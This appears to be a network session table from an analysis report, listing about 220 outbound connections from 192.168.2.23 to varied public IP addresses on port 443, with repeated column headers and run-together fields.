                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22117192.168.2.2356152167.46.4.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22118192.168.2.2346386141.173.236.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22119192.168.2.2335902137.251.31.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22120192.168.2.2343860148.63.104.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22121192.168.2.2337728182.35.161.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22122192.168.2.2359782205.255.201.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22123192.168.2.2355220153.127.47.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22124192.168.2.234029053.108.197.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22125192.168.2.2344002109.206.234.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22126192.168.2.2345846106.245.163.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22127192.168.2.23461544.94.90.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22128192.168.2.2355868190.86.155.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22129192.168.2.2349806205.240.168.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22130192.168.2.2357040102.56.22.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22131192.168.2.2356292158.129.11.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22132192.168.2.234120023.67.235.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22133192.168.2.2359024139.152.177.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22134192.168.2.2349220115.71.23.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22135192.168.2.235169267.161.82.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22136192.168.2.2355536109.162.117.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22137192.168.2.233601820.227.227.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22138192.168.2.2348370175.25.148.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22139192.168.2.234621497.193.10.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22140192.168.2.2342956114.8.121.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22141192.168.2.235129079.23.198.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22142192.168.2.2359380136.83.18.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22143192.168.2.2360092147.86.70.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22144192.168.2.233909887.72.82.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22145192.168.2.235601653.58.131.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22146192.168.2.235035894.3.116.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22147192.168.2.2341778210.247.253.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22148192.168.2.2355338115.84.79.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22149192.168.2.2335138139.246.233.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22150192.168.2.2334508161.66.57.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22151192.168.2.2349178184.242.36.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22152192.168.2.233893235.11.137.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22153192.168.2.233326637.63.77.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22154192.168.2.2348966179.110.147.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22155192.168.2.235867881.123.52.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22156192.168.2.2339260170.198.84.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22157192.168.2.2336348100.52.36.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22158192.168.2.2359258216.227.121.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22159192.168.2.2339834154.131.126.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22160192.168.2.2351498159.65.202.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22161192.168.2.2339494147.178.111.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22162192.168.2.235090286.119.153.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22163192.168.2.2334082189.100.84.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22164192.168.2.234682840.34.156.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22165192.168.2.2354248205.204.175.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22166192.168.2.2347626159.237.80.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22167192.168.2.2346320100.59.123.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22168192.168.2.235088883.94.60.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22169192.168.2.23365424.151.146.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22170192.168.2.235264860.199.185.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22171192.168.2.234639863.239.29.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22172192.168.2.2343590222.172.46.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22173192.168.2.2337292182.12.184.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22174192.168.2.234777018.25.156.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22175192.168.2.2348570193.229.223.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22176192.168.2.2349642172.240.182.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22177192.168.2.2334402151.180.160.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22178192.168.2.235845637.22.250.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22179192.168.2.235374248.100.186.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22180192.168.2.2334020197.254.254.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22181192.168.2.235448683.2.186.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22182192.168.2.2356966125.197.68.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22183192.168.2.235958231.194.230.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22184192.168.2.2349206164.159.115.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22185192.168.2.233476224.187.194.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22186192.168.2.2340078113.160.31.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22187192.168.2.2352428172.61.123.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22188192.168.2.2346422171.251.101.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22189192.168.2.2344964141.191.95.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22190192.168.2.2338208114.252.48.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22191192.168.2.234508670.183.197.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22192192.168.2.2339284188.168.42.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22193192.168.2.2337674161.127.173.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22194192.168.2.2336986132.117.23.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22195192.168.2.235368050.134.210.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22196192.168.2.2355004198.171.223.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22197192.168.2.234779894.122.117.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22198192.168.2.234343649.195.52.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22199192.168.2.235729013.158.68.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22200192.168.2.2337058195.36.60.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22201192.168.2.2334792153.34.204.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22202192.168.2.2335170183.222.238.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22203192.168.2.2349666177.121.10.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22204192.168.2.2344676122.40.57.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22205192.168.2.2349670152.170.162.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22206192.168.2.2336082169.103.39.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22207192.168.2.2339952114.182.216.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22208192.168.2.2354802118.125.170.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22209192.168.2.2342158168.143.148.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22210192.168.2.235327494.109.202.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22211192.168.2.2344568166.90.66.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22212192.168.2.2347630114.16.7.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22213192.168.2.233560812.86.66.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22214192.168.2.233444642.200.130.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22215192.168.2.235367695.0.174.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22216192.168.2.2342290136.68.19.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22217192.168.2.235534874.161.123.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22218192.168.2.234406884.173.139.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22219192.168.2.2358108108.239.50.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22220192.168.2.235349476.63.214.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22221192.168.2.234529474.240.17.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22222192.168.2.2353606141.153.169.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22223192.168.2.2342848149.195.138.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22224192.168.2.234009893.207.128.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22225192.168.2.2340544119.204.168.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22226192.168.2.2342798217.23.8.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22227192.168.2.2355508144.233.170.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22228192.168.2.235263650.226.25.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22229192.168.2.233490468.133.0.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22230192.168.2.2341802144.147.47.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22231192.168.2.235728685.131.34.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22232192.168.2.2351198174.213.175.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22233192.168.2.2338196103.93.223.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22234192.168.2.2350592131.175.27.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22235192.168.2.233510061.43.47.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22236192.168.2.235434868.177.29.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22237192.168.2.2352860165.171.31.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22238192.168.2.2352220212.229.19.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22239192.168.2.2343186135.168.10.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22240192.168.2.2343536135.110.190.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22241192.168.2.235787624.0.6.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22242192.168.2.235336863.253.211.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22243192.168.2.234859241.46.117.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22244192.168.2.234498881.14.229.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22245192.168.2.233650099.86.85.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22246192.168.2.2332940134.38.144.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22247192.168.2.2352322202.178.142.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22248192.168.2.235206634.58.34.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22249192.168.2.2356678175.63.247.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22250192.168.2.2341478118.122.1.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22251192.168.2.2334152194.221.76.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22252192.168.2.2345898104.59.192.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22253192.168.2.233369686.89.58.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22254192.168.2.234083835.117.208.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22255192.168.2.234701437.78.152.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22256192.168.2.2357454184.73.206.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22257192.168.2.2360246128.64.69.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22258192.168.2.2354178184.109.7.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22259192.168.2.235387235.164.140.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22260192.168.2.2348488132.65.200.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22261192.168.2.2360232194.182.17.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22262192.168.2.2336694108.228.62.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22263192.168.2.2353572148.40.186.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22264192.168.2.2339020126.224.254.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22265192.168.2.235742012.122.129.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22266192.168.2.235675658.181.166.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22267192.168.2.2336312173.213.102.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22268192.168.2.233817420.12.239.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22269192.168.2.2348558183.82.77.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22270192.168.2.233915646.131.83.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22271192.168.2.233646485.63.26.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22272192.168.2.235788660.39.59.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22273192.168.2.2340806216.177.219.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22274192.168.2.233460024.197.179.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22275192.168.2.236095032.237.180.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22276192.168.2.235725045.72.82.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22277192.168.2.235100243.239.170.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22278192.168.2.2354654216.135.165.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22279192.168.2.236000443.60.34.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22280192.168.2.2334184199.186.100.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22281192.168.2.234810039.4.67.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22282192.168.2.234494859.129.189.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22283192.168.2.2350690115.107.120.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22284192.168.2.234761457.195.54.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22285192.168.2.234605687.54.122.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22286192.168.2.234223680.117.245.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22287192.168.2.2346080120.147.92.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22288192.168.2.234245672.125.104.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22289192.168.2.233634454.118.63.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22290192.168.2.233488072.17.193.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22291192.168.2.2338062202.70.223.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22292192.168.2.233358476.198.22.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22293192.168.2.2348398110.137.31.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22294192.168.2.235349242.15.175.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22295192.168.2.236063632.64.81.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22296192.168.2.234243873.70.42.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22297192.168.2.2346484114.194.31.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22298192.168.2.235907464.75.105.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22299192.168.2.2353986211.202.254.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22300192.168.2.2360800120.239.12.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22301192.168.2.2351618190.62.7.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22302192.168.2.2353308142.69.243.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22303192.168.2.2356272197.78.31.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22304192.168.2.2336530197.67.97.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22305192.168.2.2356104122.86.106.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22306192.168.2.2334906115.239.51.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22307192.168.2.2356966129.63.82.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22308192.168.2.234944480.53.225.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22309192.168.2.2343192139.11.197.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22310192.168.2.234144465.100.123.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22311192.168.2.233368248.37.155.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22312192.168.2.2344254134.223.91.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22313192.168.2.2345626106.228.190.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22314192.168.2.233868099.231.84.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22315192.168.2.235001095.206.187.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22316192.168.2.2356580123.123.236.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22317192.168.2.236085490.119.108.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22318192.168.2.235402464.18.118.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22319192.168.2.2339112140.21.21.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22320192.168.2.234218861.32.144.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22321192.168.2.2355726213.19.232.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22322192.168.2.235038496.106.6.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22323192.168.2.2344862126.86.49.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22324192.168.2.233458225.238.88.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22325192.168.2.2354574113.152.128.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22326192.168.2.233848695.114.48.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22327192.168.2.234590493.52.216.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22328192.168.2.2333228157.192.64.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22329192.168.2.234179613.19.134.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22330192.168.2.234637446.13.228.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22331192.168.2.2352524109.80.91.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22332192.168.2.2351358103.68.174.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22333192.168.2.2346814119.231.80.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22334192.168.2.2354166190.45.117.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22335192.168.2.234955687.14.159.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22336192.168.2.2350862131.103.209.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22337192.168.2.235530661.200.156.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
